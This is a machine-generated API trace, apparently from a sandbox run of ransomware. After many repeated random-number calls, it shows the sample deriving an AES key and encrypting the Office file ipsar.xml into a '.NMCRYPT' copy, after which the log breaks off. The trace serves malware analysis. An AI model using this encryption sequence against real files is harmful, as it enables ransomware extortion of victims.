[0145.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.647] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.647] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.647] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.647] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.647] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.647] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.647] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.647] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.647] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.647] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.647] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.647] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.647] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0145.647] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0145.648] CryptCreateHash (in: hProv=0x8e33b8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444854 | out: phHash=0x1d444854) returned 1 [0145.648] CryptHashData (hHash=0x9ad738, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0145.648] CryptDeriveKey (in: hProv=0x8e33b8, Algid=0x6610, hBaseData=0x9ad738, dwFlags=0x4, phKey=0x1d444858 | out: phKey=0x1d444858*=0x9ad178) returned 1 [0145.648] CryptSetKeyParam (hKey=0x9ad178, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0145.648] CryptSetKeyParam (hKey=0x9ad178, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0145.648] wcslen (_String="\\\\?\\") returned 0x4 [0145.648] CryptDuplicateKey (in: hKey=0x9ad178, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad4f8) returned 1 [0145.648] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsar.xml.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsar.xml.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0145.648] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsar.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsar.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0145.684] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=2418) returned 1 [0145.684] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0145.684] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.685] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.685] GetLastError () returned 0x0 [0145.685] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.701] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.701] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.701] GetLastError () returned 0x0 [0145.701] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.701] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.701] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.701] GetLastError () returned 0x0 [0145.701] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.701] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.701] CryptEncrypt (in: hKey=0x9ad4f8, 